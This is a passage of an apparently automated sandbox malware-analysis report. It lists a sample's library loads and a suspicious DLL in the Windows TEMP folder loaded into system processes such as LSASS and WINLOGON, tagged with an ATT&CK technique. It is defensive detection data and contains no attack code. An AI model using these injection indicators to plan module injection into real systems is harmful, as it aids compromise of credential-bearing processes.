\"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74650000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 758a0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 1a70000\n \"SERVICES.EXE\" loaded module \"DWMAPI.DLL\" at base 74280000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 250000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f80000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 760d0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 3b0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75890000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74650000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76950000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 758a0000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 753a0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75130000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 760d0000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76b90000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 767f0000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74860000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760d0000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 769f0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 75dc0000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75e70000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744e0000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74e00000\n \"LSASS.EXE\" loaded module \"USER32\" at base 766d0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 430000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 530000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f80000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 760d0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 1ae0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74650000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76950000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 758a0000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 753a0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75130000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75890000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74280000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 760d0000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76b90000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 767f0000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74860000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75e70000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760d0000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 769f0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744e0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75dc0000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74e00000\n \"SMSS.EXE\" loaded module \"USER32\" at base 766d0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f80000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 430000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 14a0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 530000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 13c0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005192)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005636)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005272)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003900)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005632)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005632)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005632)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005632)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005632)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005328)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005328)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005328)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005328)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005328)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005328)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004156)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004156)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004156)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004156)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004156)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005500)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005500)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005500)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005500)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005500)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005500)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005500)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005500)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003236)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003236)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003752)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003752)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003220)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003220)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003220)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003220)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003220)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003220)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002164)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005308)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005308)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005308)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005308)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005308)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005308)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005308)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005308)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00000944)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000932)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003276)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005584)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005584)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005584)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005584)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005584)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005584)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" 